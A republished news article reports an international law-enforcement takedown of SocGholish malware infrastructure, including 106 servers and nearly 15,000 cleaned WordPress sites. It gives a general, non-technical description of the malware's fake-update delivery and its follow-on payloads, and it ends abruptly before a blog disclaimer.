Dutch law enforcement authorities, along with counterparts from Canada , Germany, and the U.S., have disrupted malicious infrastructure associated with SocGholish and cleaned up nearly 15,000 infected WordPress websites.
“With these actions we deprive cybercriminals of access to infected computer systems,” Maikel Rollman of the Netherlands National High Tech Crime Unit said.
“This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”
The takedown is part of Operation Endgame, an ongoing international law enforcement initiative to combat botnets and associated criminal infrastructures. It was launched in 2024.
As part of the effort, 106 servers linked to SocGholish have been taken down and 14,971 WordPress sites have been rid of the infections. Website owners have been notified to update their content management system (CMS), change their credentials, and delete any suspicious accounts.
Active since 2017 and also known as FakeUpdates, SocGholish is a JavaScript (JS)-based downloader malware that typically serves as a conduit for next-stage malware from various threat actors like Evil Corp (aka DEV-0243, Indrik Spider, and UNC2165), LockBit, RansomHub, Dridex, and Raspberry Robin (aka Roshtyak).Â
It’s distributed via compromised websites by masquerading as deceptive updates for web browsers like Google Chrome or Mozilla Firefox, and other popular software. The operators of the malware have been tracked under various aliases, such as Gold Prelude, Mustard Tempest, Purple Vallhund, TA569 and UNC1543.
“SocGholish infections typically originate from compromised websites that have been infected in multiple different ways,” Silent Push noted in an analysis of the malware last year. “Website infections can involve direct injections, where the SocGholish payload delivery injects JS directly loaded from an infected webpage or via a version of the direct injection that uses an intermediate JS file to load the related injection.”
In November 2025, Arctic Wolf revealed that SocGholish was being used by the RomCom threat actors to deliver the Mythic Agent, highlighting the use of the initial access broker’s services by a broad range of actors with varied motivations.
 |
| IP-geolocated SocGholish compromised WordPress sites per country |
Orange Cyberdefense said it has observed SocGholish infections delivering loaders like Gholoader (another JavaScript-based loader) and MintsLoader, which, in turn, lead to the deployment of additional payloads like GhostWeaver, LockBit, AsyncRAT, and NetSupport RAT.
“SocGholish uses a layered delivery model and has been observed enabling multiple categories of follow-on payloads,” the cybersecurity company said, adding the threat actor also…
Source link
Disclaimer
We strive to uphold the highest ethical standards in all of our reporting and coverage. We blogs.grocliq.com want to be transparent with our readers about any potential conflicts of interest that may arise in our work. It’s possible that some of the investors we feature may have connections to other businesses, including competitors or companies we write about. However, we want to assure our readers that this will not have any impact on the integrity or impartiality of our reporting. We are committed to delivering accurate, unbiased news and information to our audience, and we will continue to uphold our ethics and principles in all of our work. Thank you for your trust and support.
Website Upgradation is going on for any glitch kindly connect at [email protected]
